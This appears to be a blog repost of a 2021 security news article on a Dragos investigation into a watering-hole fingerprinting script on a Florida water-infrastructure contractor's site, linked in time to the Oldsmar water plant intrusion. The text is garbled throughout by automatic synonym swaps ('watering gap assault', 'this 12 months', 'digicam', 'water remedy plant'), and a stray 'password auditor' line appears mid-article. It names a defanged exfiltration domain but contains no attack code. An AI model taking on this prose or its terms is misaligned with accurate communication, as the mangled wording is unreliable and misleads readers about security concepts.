Colin Mc Hugo

0 %
Colin Mc Hugo
Security Engineer Manager & CEO at Quantum Infinite Solutions Group Ltd.

Watering Hole Attack Was Used to Target Florida Water Utilities

May 20, 2021
Watering Hole Attack

An investigation undertaken within the aftermath of the Oldsmar water plant hack earlier this 12 months has revealed that an infrastructure contractor within the U.S. state of Florida hosted malicious code on its web site in what’s generally known as a watering gap assault.

“This malicious code seemingly focused water utilities, significantly in Florida, and extra importantly, was visited by a browser from town of Oldsmar on the identical day of the poisoning occasion,” Dragos researcher Kent Backman said in a write-up printed on Tuesday.

The location, which belongs to a Florida-based normal contractor concerned in constructing water and wastewater remedy services, had no bearing on the intrusion, the American industrial cybersecurity agency mentioned.

password auditor

Watering gap assaults sometimes permit an adversary to compromise a particular group of end-users by compromising a fastidiously chosen web site, which members of that group are recognized to go to, with an intention to realize entry to the sufferer’s system and infect it with malware.

On this particular case, nevertheless, the contaminated web site did not ship exploit code or try to realize entry to guests’ programs. As an alternative, the injected code functioned as a browser enumeration and fingerprinting script that harvested numerous particulars concerning the web site’s guests, together with working system, CPU, browser (and plugins), enter strategies, presence of a digicam, accelerometer, microphone, time zone, places, video codecs, and display screen dimensions.

The collected info was then exfiltrated to a database hosted on a Heroku app website (bdatac.herokuapp[.]com) that additionally saved the script. The app has since been taken down. Dragos suspects a susceptible WordPress plugin might have been exploited to insert the script into the web site’s code.

No fewer than 1,000 end-user computer systems visited the contaminated website in the course of the 58-day window starting Dec. 20, 2020, earlier than it was remediated on Feb. 16, 2021. “Those that interacted with the malicious code included computer systems from municipal water utility prospects, state and native authorities businesses, numerous water industry-related non-public firms, and regular web bot and web site crawler visitors,” Backman mentioned.

“Dragos’ greatest evaluation is that an actor deployed the watering gap on the water infrastructure development firm website to gather authentic browser information for the aim of bettering the botnet malware’s means to impersonate authentic internet browser exercise,” the researcher added.

Primarily based on telemetry information gathered by the corporate, one amongst these 1,000 visits got here from a pc residing within the community belonging to the Metropolis of Oldsmar on Feb. 5, the identical day an unidentified adversary managed to extend sodium hydroxide dosage within the water provide to harmful ranges by remotely accessing the SCADA system on the water remedy plant.

The attackers had been finally foiled of their try by an operator, who managed to catch the manipulation in real-time and restored the focus ranges to undo the injury. The unauthorized entry is alleged to have occurred via TeamViewer distant desktop software program put in on one of many plant’s a number of computer systems that had been linked to the management system.

The Oldsmar plant cyberattack, and extra just lately the Colonial Pipeline ransomware incident, have set off issues concerning the potential for tampering with industrial management programs deployed in vital infrastructure, prompting the U.S. government to take steps to bolster defenses by defending federal networks and bettering information-sharing between the U.S. authorities and the non-public sector on cyber points, amongst others.

“This isn’t a typical watering gap,” Backman mentioned. “We’ve medium confidence it didn’t straight compromise any group. However it does characterize an publicity danger to the water {industry} and highlights the significance of controlling entry to untrusted web sites, particularly for Operational Expertise (OT) and Industrial Management System (ICS) environments.”

Posted in SecurityTags:
Write a comment